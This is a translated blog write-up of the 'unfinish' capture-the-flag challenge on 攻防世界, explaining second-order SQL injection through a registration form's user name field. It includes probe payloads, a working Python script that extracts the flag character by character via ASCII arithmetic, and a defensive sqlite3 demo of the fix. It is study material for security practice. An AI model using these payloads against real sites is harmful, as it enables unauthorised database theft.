攻防世界 (Attack and Defense World): unfinish

  • Title description: SQL injection
  • Accessing the site gives a login page
  • Scanned it with dirsearch
  • Visit register.php
  • Registered an account and logged in; it just returned to the login page, which seemed useless
  • But then I remembered an injection method I had mentioned when writing up the basics of SQL injection, without studying it carefully at the time:
  • Second-order injection (二次注入)
  • The injection point here should be the name field on the register.php page
  • Because the email and password still have to be used when logging in
  • For details, please see my previous article
  • Registering with a single quote in the name failed, so I changed the user name to root' and '1 and the registration succeeded
  • That is, the value is closed with single quotes here, and there is no addslashes() escaping of the kind I had learned about before
  • After logging in at this point, the user name displayed is 0
  • So SQL injection definitely exists here, but when I tried registering the name 1' union select 1,database()#
  • it also just returned 1, nnnnoooo!!!! So is there still a filter here????
  • So fuzz it with Burp Suite
  • A lot of things are filtered, information_schema among them; honestly, I had no idea how to get around that
  • No choice but to look at the writeup (wp)
  • Attached is the script from the boss (the writeup author)
import requests
import re

# Challenge endpoints from the write-up
register_url = 'http://111.200.241.244:45701/register.php'
login_url = 'http://111.200.241.244:45701/login.php'

# Read the flag one character at a time: each round registers a fresh account
# whose user name evaluates to the ASCII code of the i-th flag character once
# the application reuses it in its second query.
for i in range(1, 100):
    # The email address is a placeholder; the original value was lost to extraction
    email = 'user%d@example.com' % i
    register_data = {
        'email': email,
        'username': "0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
        'password': 'admin'
    }
    requests.post(url=register_url, data=register_data)

    login_data = {
        'email': email,
        'password': 'admin'
    }
    res_ = requests.post(url=login_url, data=login_data)
    # The page renders the evaluated user name, i.e. the ASCII code of this character
    code = re.search(r'<span class="user-name">\s*(\d*)\s*</span>', res_.text)
    if code is None or not code.group(1) or int(code.group(1)) == 0:
        break  # past the end of the flag: substr() yields '' and ascii('') is 0
    print(chr(int(code.group(1))), end='')
  • The following is my own understanding
  • Since the user name is what gets injected second-order, and information_schema is filtered, union injection is definitely not an option.
  • The role of + in MySQL is to convert the strings to numbers and add them:
'1' + '1a' # 2 ('1a' converts to 1)
'0' + database() # 0 (a non-numeric string converts to 0)
'0' + ascii(substr(database(),1,1)) # 100, so the ASCII value of the first character of database() is 100
  • So the core injection code is
"0' + ascii(substr((select * from flag) from %d for 1)) + '0" % i,
  • After that, the user name value on the login.php page is obtained with the regex, which is the ASCII code of each character of the flag.
  • I want to add to my knowledge of MySQL. What I learned before is not enough for the current challenge...
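To show the mechanism from the defender's side, here is an added example (not from the original post or the challenge) that simulates the second-order bug with Python's sqlite3 standing in for MySQL: registration binds the user name safely, but the vulnerable login path splices the stored name into a second statement, so the page's root' and '1 probe evaluates to 0, while the hardened path binds it in every statement. The table layout and the profile insert are assumptions, since the challenge source is not on the page.

```python
import sqlite3

# sqlite3 stands in for the challenge's MySQL backend (assumption); both engines
# coerce a non-numeric string to 0 in arithmetic or boolean context, which is
# exactly what turns a stored "root' and '1" into the displayed user name 0.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (email TEXT PRIMARY KEY, username TEXT, password TEXT)")
    # display_name is left untyped so it keeps whatever type the expression yields
    db.execute("CREATE TABLE profile (email TEXT, display_name)")
    return db

def register(db, email, username, password):
    # Registration is parameterised, so a quote in the user name is stored verbatim.
    db.execute("INSERT INTO user VALUES (?, ?, ?)", (email, username, password))

def _lookup(db, email, password):
    return db.execute("SELECT username FROM user WHERE email=? AND password=?",
                      (email, password)).fetchone()

def _display(db, email):
    return str(db.execute("SELECT display_name FROM profile WHERE email=?",
                          (email,)).fetchone()[0])

def login_vulnerable(db, email, password):
    row = _lookup(db, email, password)
    if row is None:
        return None
    # Second-order bug: the value read back from the database is treated as
    # trusted and spliced into a second statement, so the stored quote closes
    # the string literal and the rest is evaluated as SQL.
    db.execute("INSERT INTO profile VALUES ('%s', '%s')" % (email, row[0]))
    return _display(db, email)

def login_safe(db, email, password):
    row = _lookup(db, email, password)
    if row is None:
        return None
    # Fix: bind the value in every statement, including those that merely
    # reuse data already in the database.
    db.execute("INSERT INTO profile VALUES (?, ?)", (email, row[0]))
    return _display(db, email)

def demo(username):
    """Register username in both variants; return (vulnerable_display, safe_display)."""
    results = []
    for login in (login_vulnerable, login_safe):
        db = make_db()
        register(db, "probe@example.com", username, "admin")  # constructed account
        results.append(login(db, "probe@example.com", "admin"))
    return tuple(results)

if __name__ == "__main__":
    print(demo("root' and '1"))  # ('0', "root' and '1")
```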

Origin blog.csdn.net/CyhDl666/article/details/114098455